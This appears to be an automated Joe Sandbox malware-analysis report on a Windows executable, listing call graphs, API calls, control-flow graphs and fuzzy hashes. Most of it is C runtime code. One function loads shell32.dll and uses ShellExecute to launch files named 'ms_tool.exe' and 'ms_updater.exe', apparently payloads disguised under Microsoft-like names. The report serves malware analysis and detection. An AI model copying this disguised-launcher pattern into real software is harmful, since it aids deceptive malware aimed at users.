f75ff9 21895->21897 21899 f61f31 __dosmaperr 14 API calls 21896->21899 21898 f7634f 21897->21898 21903 f7603f 21897->21903 21900 f61f31 __dosmaperr 14 API calls 21898->21900 21901 f75fe6 21899->21901 21902 f76354 21900->21902 21904 f61f44 __dosmaperr 14 API calls 21901->21904 21906 f61f44 __dosmaperr 14 API calls 21902->21906 21905 f75fee 21903->21905 21907 f7604a 21903->21907 21913 f7607a 21903->21913 21904->21905 21905->21837 21908 f76057 21906->21908 21909 f61f31 
__dosmaperr 14 API calls 21907->21909 21911 f61e30 _Ungetc 44 API calls 21908->21911 21910 f7604f 21909->21910 21912 f61f44 __dosmaperr 14 API calls 21910->21912 21911->21905 21912->21908 21914 f76093 21913->21914 21915 f760de 21913->21915 21916 f760ad 21913->21916 21914->21916 21922 f76098 21914->21922 21919 f694cc std::_Locinfo::_Locinfo_ctor 15 API calls 21915->21919 21917 f61f31 __dosmaperr 14 API calls 21916->21917 21918 f760b2 21917->21918 21920 f61f44 __dosmaperr 14 API calls 21918->21920 21923 f760ef 21919->21923 21921 f7596d __wsopen_s 44 API calls 21925 f7622b 21921->21925 21922->21921 21926 f681d7 ___free_lconv_mon 14 API calls 21923->21926 21959 f77891 _Fputc 21958->21959 21989 f778b5 21959->21989 22093 f653d1 22092->22093 22094 f653bc 22092->22094 22093->21852 22095 f61f44 __dosmaperr 14 API calls 22094->22095 22096 f653c1 22095->22096 22097 f61e30 _Ungetc 44 API calls 22096->22097 22098 f653cc 22097->22098 22098->21852 22100 f6ad29 _Fputc 22099->22100 22101 f6ad4d __wsopen_s 69 API calls 22100->22101 22102 f6ad3b 22101->22102 22103 f5fa59 _Fputc 44 API calls 22102->22103 22104 f6ad48 22103->22104 22104->21861 22105->21708 23257 f5f99d 23258 f62c79 ___scrt_uninitialize_crt 71 API calls 23257->23258 23259 f5f9a5 23258->23259 23267 f6899b 23259->23267 23261 f5f9aa 23262 f68a46 14 API calls 23261->23262 23263 f5f9b9 DeleteCriticalSection 23262->23263 23263->23261 23264 f5f9d4 23263->23264 23265 f681d7 ___free_lconv_mon 14 API calls 23264->23265 23266 f5f9df 23265->23266 23268 f689a7 __FrameHandler3::FrameUnwindToState 23267->23268 23277 f61f98 EnterCriticalSection 23268->23277 23270 f68a1e 23278 f68a3d 23270->23278 23273 f689f2 DeleteCriticalSection 23275 f681d7 ___free_lconv_mon 14 API calls 23273->23275 23274 f5fc1d 72 API calls 23276 f689b2 23274->23276 23275->23276 23276->23270 23276->23273 23276->23274 23277->23276 23281 f61fe0 LeaveCriticalSection 23278->23281 23280 f68a2a 23280->23261 23281->23280 21618 f5af9f 21619 f5bab1 GetModuleHandleW 
21618->21619 21620 f5afa7 21619->21620 21621 f5afdd 21620->21621 21622 f5afab 21620->21622 21623 f6535e std::locale::_Setgloballocale 23 API calls 21621->21623 21626 f5afb6 21622->21626 21627 f65340 21622->21627 21625 f5afe5 21623->21625 21628 f65182 std::locale::_Setgloballocale 23 API calls 21627->21628 21629 f6534b 21628->21629 21629->21626 25069 f63399 25070 f633ac _Fputc 25069->25070 25075 f632d0 25070->25075 25072 f633c1 25073 f5fa59 _Fputc 44 API calls 25072->25073 25074 f633ce 25073->25074 25076 f63305 25075->25076 25077 f632e2 25075->25077 25076->25077 25080 f6332c 25076->25080 25078 f61db3 _Fputc 44 API calls 25077->25078 25079 f632fd 25078->25079 25079->25072 25083 f631d5 25080->25083 25084 f631e1 __FrameHandler3::FrameUnwindToState 25083->25084 25091 f5f9e9 EnterCriticalSection 25084->25091 25086 f631ef 25092 f63230 25086->25092 25088 f631fc 25101 f63224 25088->25101 25091->25086 25093 f62bab ___scrt_uninitialize_crt 69 API calls 25092->25093 25094 f6324b 25093->25094 25095 f68a46 14 API calls 25094->25095 25096 f63255 25095->25096 25097 f63270 25096->25097 25098 f6817a __dosmaperr 14 API calls 25096->25098 25097->25088 25099 f63294 25098->25099 25100 f681d7 ___free_lconv_mon 14 API calls 25099->25100 25100->25097 25104 f5f9fd LeaveCriticalSection 25101->25104 25103 f6320d 25103->25072 25104->25103 23332 f58573 23337 f556a0 23332->23337 23334 f585be __Mtx_unlock 23336 f585a4 23336->23334 23343 f58a85 23336->23343 23347 f5a714 23337->23347 23340 f556ba 23340->23336 23344 f58a92 23343->23344 23440 f5a725 GetCurrentThreadId 23344->23440 23346 f58aba 23346->23336 23380 f5a4d4 23347->23380 23350 f58bca 23351 f58bd5 23350->23351 23352 f58be8 23350->23352 23351->23352 23354 f5f7b3 23351->23354 23410 f58bf7 23352->23410 23355 f67a10 std::locale::_Setgloballocale 2 API calls 23354->23355 23356 f5f7b8 23355->23356 23357 f5f7c3 23356->23357 23358 f67a55 std::locale::_Setgloballocale 44 API calls 23356->23358 23359 f5f7cd IsProcessorFeaturePresent 23357->23359 
23360 f5f7ec 23357->23360 23358->23357 23361 f5f7d9 23359->23361 23362 f6535e std::locale::_Setgloballocale 23 API calls 23360->23362 23363 f61c34 std::locale::_Setgloballocale 8 API calls 23361->23363 23364 f5f7f6 __FrameHandler3::FrameUnwindToState 23362->23364 23363->23360 23365 f5f80a 23364->23365 23368 f5f82a 23364->23368 23366 f61f44 __dosmaperr 14 API calls 23365->23366 23367 f5f80f 23366->23367 23369 f61e30 _Ungetc 44 API calls 23367->23369 23370 f5f83c 23368->23370 23371 f5f82f 23368->23371 23373 f556ca 23369->23373 23372 f67c48 17 API calls 23370->23372 23374 f61f44 __dosmaperr 14 API calls 23371->23374 23375 f5f845 23372->23375 23374->23373 23376 f5f84c 23375->23376 23377 f5f859 23375->23377 23378 f61f44 __dosmaperr 14 API calls 23376->23378 23379 f5f897 LeaveCriticalSection 23377->23379 23378->23373 23379->23373 23381 f5a536 23380->23381 23382 f5a4fc GetCurrentThreadId 23380->23382 23383 f5a560 23381->23383 23384 f5a53a GetCurrentThreadId 23381->23384 23385 f5a507 GetCurrentThreadId 23382->23385 23386 f5a522 23382->23386 23387 f5a5fe GetCurrentThreadId 23383->23387 23391 f5a581 23383->23391 23388 f5a549 23384->23388 23385->23386 23389 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 23386->23389 23387->23388 23388->23386 23390 f5a647 GetCurrentThreadId 23388->23390 23393 f556b3 23389->23393 23390->23386 23398 f5aa6e 23391->23398 23393->23340 23393->23350 23395 f5a5bd GetCurrentThreadId 23395->23388 23396 f5a58c __Xtime_diff_to_millis2 23395->23396 23396->23386 23396->23388 23396->23395 23397 f5aa6e 2 API calls 23396->23397 23397->23396 23399 f5aa87 __aulldiv __aullrem 23398->23399 23400 f5aa7a 23398->23400 23399->23396 23400->23399 23402 f5aa47 23400->23402 23405 f5ad79 23402->23405 23406 f5ad96 GetSystemTimeAsFileTime 23405->23406 23407 f5ad8a GetSystemTimePreciseAsFileTime 23405->23407 23408 f5aa55 23406->23408 23407->23408 23408->23399 23411 f58c0d 23410->23411 23418 f58b7d 23411->23418 23419 f58b89 __EH_prolog3_GS 
23418->23419 23428 f55730 23419->23428 23422 f51590 std::ios_base::_Init 46 API calls 23423 f58bb2 23422->23423 23432 f556e0 23423->23432 23425 f58bba 23437 f5b4a9 23425->23437 23429 f55751 23428->23429 23429->23429 23430 f55e30 std::ios_base::_Init 46 API calls 23429->23430 23431 f55763 23430->23431 23431->23422 23433 f556eb 23432->23433 23434 f55706 codecvt 23432->23434 23433->23434 23435 f61e40 std::ios_base::_Init 44 API calls 23433->23435 23434->23425 23436 f5572a 23435->23436 23438 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 23437->23438 23439 f5b4b3 23438->23439 23439->23439 23440->23346 23452 f5116f 23453 f51178 23452->23453 23458 f592b5 23453->23458 23455 f51187 23456 f5b44f 47 API calls 23455->23456 23457 f511d3 23456->23457 23459 f592c1 __EH_prolog3 23458->23459 23460 f5b1e3 codecvt 16 API calls 23459->23460 23461 f592d0 23460->23461 23463 f592e2 std::locale::_Init 23461->23463 23464 f58e8e 23461->23464 23463->23455 23465 f58e9a __EH_prolog3 23464->23465 23466 f58aee std::_Lockit::_Lockit 7 API calls 23465->23466 23467 f58ea5 23466->23467 23475 f58ed6 23467->23475 23476 f58ff3 23467->23476 23469 f58b46 std::_Lockit::~_Lockit 2 API calls 23471 f58f16 std::locale::_Init 23469->23471 23470 f58eb8 23482 f59016 23470->23482 23471->23463 23474 f58de6 _Yarn 15 API calls 23474->23475 23475->23469 23477 f5b1e3 codecvt 16 API calls 23476->23477 23478 f58ffe 23477->23478 23479 f59012 23478->23479 23486 f58d22 23478->23486 23479->23470 23483 f58ec0 23482->23483 23484 f59022 23482->23484 23483->23474 23489 f5ab6a 23484->23489 23487 f58de6 _Yarn 15 API calls 23486->23487 23488 f58d5c 23487->23488 23488->23470 23490 f5f7b3 23489->23490 23491 f5ab7a EncodePointer 23489->23491 23492 f67a10 std::locale::_Setgloballocale 2 API calls 23490->23492 23491->23483 23491->23490 23493 f5f7b8 23492->23493 23494 f67a55 std::locale::_Setgloballocale 44 API calls 23493->23494 23497 f5f7c3 23493->23497 23494->23497 23495 f5f7cd 
IsProcessorFeaturePresent 23498 f5f7d9 23495->23498 23496 f5f7ec 23499 f6535e std::locale::_Setgloballocale 23 API calls 23496->23499 23497->23495 23497->23496 23500 f61c34 std::locale::_Setgloballocale 8 API calls 23498->23500 23501 f5f7f6 __FrameHandler3::FrameUnwindToState 23499->23501 23500->23496 23502 f5f80a 23501->23502 23505 f5f82a 23501->23505 23503 f61f44 __dosmaperr 14 API calls 23502->23503 23504 f5f80f 23503->23504 23506 f61e30 _Ungetc 44 API calls 23504->23506 23507 f5f83c 23505->23507 23508 f5f82f 23505->23508 23510 f5f81a 23506->23510 23509 f67c48 17 API calls 23507->23509 23511 f61f44 __dosmaperr 14 API calls 23508->23511 23512 f5f845 23509->23512 23510->23483 23511->23510 23513 f5f84c 23512->23513 23514 f5f859 23512->23514 23515 f61f44 __dosmaperr 14 API calls 23513->23515 23516 f5f897 LeaveCriticalSection 23514->23516 23515->23510 23516->23510
                                                      APIs
                                                      • LoadLibraryW.KERNELBASE(shell32.dll), ref: 00F54CBA
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00F54F44
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00F54F62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteShell$LibraryLoad
                                                      • String ID: !$%x and %p$\ms_tool.exe$\ms_updater.exe$open$shell32.dll
                                                      • API String ID: 1367575721-2575606789
                                                      • Opcode ID: 11f94cd4dd20f2f6b8902ac010856ce33058d341da303a7fcf4c14f4dd5f5c5a
                                                      • Instruction ID: 64120a538ef869beb5213b304cb3abb7c263a51e300583150d48b81a32e56ed9
                                                      • Opcode Fuzzy Hash: 11f94cd4dd20f2f6b8902ac010856ce33058d341da303a7fcf4c14f4dd5f5c5a
                                                      • Instruction Fuzzy Hash: E6B20527A30A1A07E30CA5388C523E6B68AEBD6731F454336FE66D73F4D3694846D740

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00F73905: CreateFileW.KERNELBASE(?,00000000,?,00F73CF5,?,?,00000000,?,00F73CF5,?,0000000C), ref: 00F73922
                                                      • GetLastError.KERNEL32 ref: 00F73D60
                                                      • __dosmaperr.LIBCMT ref: 00F73D67
                                                      • GetFileType.KERNELBASE(00000000), ref: 00F73D73
                                                      • GetLastError.KERNEL32 ref: 00F73D7D
                                                      • __dosmaperr.LIBCMT ref: 00F73D86
                                                      • CloseHandle.KERNEL32(00000000), ref: 00F73DA6
                                                      • CloseHandle.KERNEL32(00F68017), ref: 00F73EF3
                                                      • GetLastError.KERNEL32 ref: 00F73F25
                                                      • __dosmaperr.LIBCMT ref: 00F73F2C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 61c5c325619ca7ef94f9af2cbf7f61285afa5f7ed742c7353118483ebcc21b8c
                                                      • Instruction ID: d6b3c81c1054d9f29fafa14513f8f449405aff7fe4976f1f3dd9d2c8947a5d28
                                                      • Opcode Fuzzy Hash: 61c5c325619ca7ef94f9af2cbf7f61285afa5f7ed742c7353118483ebcc21b8c
                                                      • Instruction Fuzzy Hash: 00A14932E14158AFCF199F68DC51BAD3BB1AB06320F14415EF8159B3A1C7349E12FB92

                                                      Control-flow Graph

                                                      APIs
                                                      • LoadLibraryW.KERNELBASE(shell32.dll), ref: 00F54CBA
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00F54F44
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00F54F62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteShell$LibraryLoad
                                                      • String ID: !$\ms_tool.exe$\ms_updater.exe$open$shell32.dll
                                                      • API String ID: 1367575721-3118137208
                                                      • Opcode ID: 023fe09e9da69b28d441d089bf35c28ba98085476ffba42cb78551b4f0b13580
                                                      • Instruction ID: b676dd6d55a7f818f25218f15afc3f8b07588f2cf802b5d017a41af7bc214b67
                                                      • Opcode Fuzzy Hash: 023fe09e9da69b28d441d089bf35c28ba98085476ffba42cb78551b4f0b13580
                                                      • Instruction Fuzzy Hash: F7A1F1706083409BE724DF28CC46F6AB7E4BF85705F144A1CFA858B291E7B4E949DB92

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?,00F65213,00000016,00F5FC1C,?,?,8C9F690D,00F5FC1C,?), ref: 00F6522A
                                                      • TerminateProcess.KERNEL32(00000000,?,00F65213,00000016,00F5FC1C,?,?,8C9F690D,00F5FC1C,?), ref: 00F65231
                                                      • ExitProcess.KERNEL32 ref: 00F65243
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 68ed4075f42d5afa7a991797561f34cdee828c64cf4b41fc5d9b505453ade4ac
                                                      • Instruction ID: 4485f6a05932abea852745063a71b6860f7872cefb566e97ee72ee52a5f618ac
                                                      • Opcode Fuzzy Hash: 68ed4075f42d5afa7a991797561f34cdee828c64cf4b41fc5d9b505453ade4ac
                                                      • Instruction Fuzzy Hash: 66D09E32000508AFCF012FA0DC1D95D3F25EF90791F454460B91E59031DB799995BB42

                                                      Control-flow Graph

                                                      control_flow_graph 353 f6ae55-f6ae74 354 f6b04e 353->354 355 f6ae7a-f6ae7c 353->355 358 f6b050-f6b054 354->358 356 f6ae7e-f6ae9d call f61db3 355->356 357 f6aea8-f6aece 355->357 364 f6aea0-f6aea3 356->364 360 f6aed4-f6aeda 357->360 361 f6aed0-f6aed2 357->361 360->356 363 f6aedc-f6aee6 360->363 361->360 361->363 365 f6aef6-f6af01 call f6a9a2 363->365 366 f6aee8-f6aef3 call f6c893 363->366 364->358 371 f6af43-f6af55 365->371 372 f6af03-f6af08 365->372 366->365 375 f6afa6-f6afc6 WriteFile 371->375 376 f6af57-f6af5d 371->376 373 f6af2d-f6af41 call f6a568 372->373 374 f6af0a-f6af0e 372->374 395 f6af26-f6af28 373->395 377 f6b016-f6b028 374->377 378 f6af14-f6af23 call f6a93a 374->378 380 f6afd1 375->380 381 f6afc8-f6afce GetLastError 375->381 382 f6af94-f6afa4 call f6aa20 376->382 383 f6af5f-f6af62 376->383 384 f6b032-f6b044 377->384 385 f6b02a-f6b030 377->385 378->395 389 f6afd4-f6afdf 380->389 381->380 400 f6af7d-f6af80 382->400 390 f6af64-f6af67 383->390 391 f6af82-f6af92 call f6abe4 383->391 384->364 385->354 385->384 396 f6afe1-f6afe6 389->396 397 f6b049-f6b04c 389->397 390->377 398 f6af6d-f6af78 call f6aafb 390->398 391->400 395->389 401 f6b014 396->401 402 f6afe8-f6afed 396->402 397->358 398->400 400->395 401->377 404 f6b006-f6b00f call f61f0d 402->404 405 f6afef-f6b001 402->405 404->364 405->364
                                                      APIs
                                                        • Part of subcall function 00F6A568: GetConsoleOutputCP.KERNEL32(8C9F690D,00000000,00000000,00F5FC3C), ref: 00F6A5CB
                                                      • WriteFile.KERNELBASE(FFBF67E8,00000000,?,00F5FAF9,00000000,00000000,00000000,00000000,?,?,00F5FAF9,?,?,00F87CB8,00000010,00F5FC3C), ref: 00F6AFBE
                                                      • GetLastError.KERNEL32(?,00F5FAF9,?,?,00F87CB8,00000010,00F5FC3C,?,?,00000000,?), ref: 00F6AFC8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ConsoleErrorFileLastOutputWrite
                                                      • String ID:
                                                      • API String ID: 2915228174-0
                                                      • Opcode ID: 1a0bb558516d3cc5ef9718892cb14ec4fa611647e2d6a37b58dc5cf97d5e42ab
                                                      • Instruction ID: 3c0c000fcba3a3dbb1198f1cd1a88679aa8966f0e3b4b7f84370d8f20bfa1d14
                                                      • Opcode Fuzzy Hash: 1a0bb558516d3cc5ef9718892cb14ec4fa611647e2d6a37b58dc5cf97d5e42ab
                                                      • Instruction Fuzzy Hash: 3661AFB2D04149AEDF11CFA8C884AEEBFB9AF19314F144185E814B7252D376D941EFA2

                                                      Control-flow Graph

                                                      control_flow_graph 408 f68e03-f68e17 call f709cf 411 f68e1d-f68e25 408->411 412 f68e19-f68e1b 408->412 413 f68e27-f68e2e 411->413 414 f68e30-f68e33 411->414 415 f68e6b-f68e8b call f7093e 412->415 413->414 416 f68e3b-f68e4f call f709cf * 2 413->416 417 f68e35-f68e39 414->417 418 f68e51-f68e61 call f709cf FindCloseChangeNotification 414->418 425 f68e9d 415->425 426 f68e8d-f68e9b call f61f0d 415->426 416->412 416->418 417->416 417->418 418->412 430 f68e63-f68e69 GetLastError 418->430 428 f68e9f-f68ea2 425->428 426->428 430->415
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00F68CEA,00000000,CF830579,00F88088,0000000C,00F68DA6,00F5FB8F,?), ref: 00F68E59
                                                      • GetLastError.KERNEL32(?,00F68CEA,00000000,CF830579,00F88088,0000000C,00F68DA6,00F5FB8F,?), ref: 00F68E63
Memory Dump Source
• Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
Similarity
                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                      • String ID:
                                                      • API String ID: 1687624791-0
                                                      • Opcode ID: f62e9140e18f4311821d32a837103f848c823fad21585a0011250af1553559a6
                                                      • Instruction ID: ea4117d2dcb5329f44d17fc31eb525c71693eacf723ab7b1ad6e7350fd4e6ff1
                                                      • Opcode Fuzzy Hash: f62e9140e18f4311821d32a837103f848c823fad21585a0011250af1553559a6
                                                      • Instruction Fuzzy Hash: 7211AF33E052186AD62022B09C5577E37554FD27B4F25070DFA08872D3DF768C827292

                                                      Control-flow Graph

                                                      control_flow_graph 433 f55050-f5508d CreateThread WaitForSingleObject call f5aff0 435 f55092-f55095 433->435
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,00F54C70,00000000,00000000,8C9F690D), ref: 00F55076
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,000000B0,?,?,?), ref: 00F5507F
Memory Dump Source
• Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
Similarity
                                                      • API ID: CreateObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 1891408510-0
                                                      • Opcode ID: 4697811367ba5b7aa1826d9d20f7774c040fe3b2bb4c16ebb3bddf06406ebe05
                                                      • Instruction ID: 6a0d2be247f4e7aea5e1a95af76a0572e74fd0b82741801e7e4dca73e6e392a8
                                                      • Opcode Fuzzy Hash: 4697811367ba5b7aa1826d9d20f7774c040fe3b2bb4c16ebb3bddf06406ebe05
                                                      • Instruction Fuzzy Hash: CBE086706483006BD710AF34EC0BF2E37E4BB48B12F610A18F699962D0E674B458A757

                                                      Control-flow Graph

                                                      control_flow_graph 436 f67fd8-f67ffe call f67dae 439 f68057-f6805a 436->439 440 f68000-f68012 call f73c2c 436->440 442 f68017-f6801c 440->442 442->439 443 f6801e-f68056 442->443
                                                      APIs
Memory Dump Source
• Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
Similarity
                                                      • API ID: __wsopen_s
                                                      • String ID:
                                                      • API String ID: 3347428461-0
                                                      • Opcode ID: a2b1053ad2fd5c2eee0689d522216b0ccb0bbf11938d58076b7bbafc88d5e47f
                                                      • Instruction ID: 9aaebffbcb6ac793e98012c5fd5c02070bcf1ca56bbe1d74899b180915916844
                                                      • Opcode Fuzzy Hash: a2b1053ad2fd5c2eee0689d522216b0ccb0bbf11938d58076b7bbafc88d5e47f
                                                      • Instruction Fuzzy Hash: 1C115771A0420AAFCF05DF58E94199B7BF4EF48304F008469F808EB351D630EA15DB65

                                                      Control-flow Graph

                                                      control_flow_graph 444 f6817a-f68185 445 f68187-f68191 444->445 446 f68193-f68199 444->446 445->446 447 f681c7-f681d2 call f61f44 445->447 448 f681b2-f681c3 RtlAllocateHeap 446->448 449 f6819b-f6819c 446->449 453 f681d4-f681d6 447->453 450 f681c5 448->450 451 f6819e-f681a5 call f66c34 448->451 449->448 450->453 451->447 457 f681a7-f681b0 call f66c7f 451->457 457->447 457->448
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,0000000C,?,?,00F6937F,00000001,00000364,?,00000005,000000FF,?,?,00F61F49,00F6950F), ref: 00F681BB
Memory Dump Source
• Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
